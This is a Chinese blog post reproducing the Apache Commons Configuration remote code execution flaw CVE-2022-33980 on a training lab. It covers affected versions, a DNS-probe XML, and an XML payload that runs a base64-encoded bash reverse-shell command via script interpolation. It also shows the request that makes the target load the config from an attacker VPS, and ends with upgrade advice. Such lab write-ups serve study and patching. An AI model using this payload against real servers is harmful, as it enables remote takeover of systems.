banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

Apache Commons Configuration远程命令执行漏洞漏洞复现

产品简介

Apache Commons Configuration 是 Apache 基金会下的一个开源项目组件。它提供了一种通用的方式,让 Java 开发者可以使用统一的接口读取不同类型的配置文件

漏洞概述

该漏洞是由于 Apache Commons Configuration 提供的 Configuration 变量解释功能存在缺陷,攻击者可利用该漏洞在特定情况下,构造恶意数据执行远程代码。

cve 编号:CVE-2022-33980
靶场:春秋云镜

影响范围

2.4 <= Apache Commons Configuration <=2.7

利用流程

image

  • xml 文件
<?xml version="1.0" encoding="ISO-8859-1" ?>
<configuration>
        <path>${dns:lll.f8bd5ff2.dns.1433.eu.org.}</path>
</configuration>

payload:java 命令执行 payloads - 小草窝博客

image

<?xml version="1.0" encoding="ISO-8859-1" ?>
<configuration>
        <path>${script:js:java.lang.Runtime.getRuntime().exec("bash -c {echo,Ym........zNCA8JjE=}|{base64,-d}|{bash,-i}")}</path>
</configuration>
  • 具体请求
http://eci-2ze0j2j6z0mbs5fzqkue.cloudeci1.ichunqiu.com/Url?url=http://vps_ip:8000/config.xml&data=path

image

修复建议

目前官方已发布修复版本修复了该漏洞,请受影响的用户升级到 Apache Commons Configuration 2.8.0 版本。

https://commons.apache.org/proper/commons-configuration/download_configuration.cgi

参考

GitHub - tangxiaofeng7/CVE-2022-33980-Apache-Commons-Configuration-RCE: CVE-2022-33980 Apache Commons Configuration 远程命令执行漏洞

GitHub - sammwyy/CVE-2022-33980-POC: POC for CVE-2022-33980 (Apache Commons Configuration RCE vulnerability)

GitHub - sammwyy/CVE-2022-33980-POC: POC for CVE-2022-33980 (Apache Commons Configuration RCE vulnerability)

CVE-2022-41852 Apache Commons Jxpath 命令执行漏洞分析

图片来自

加载中...
此文章数据所有权由区块链加密技术和智能合约保障仅归创作者所有。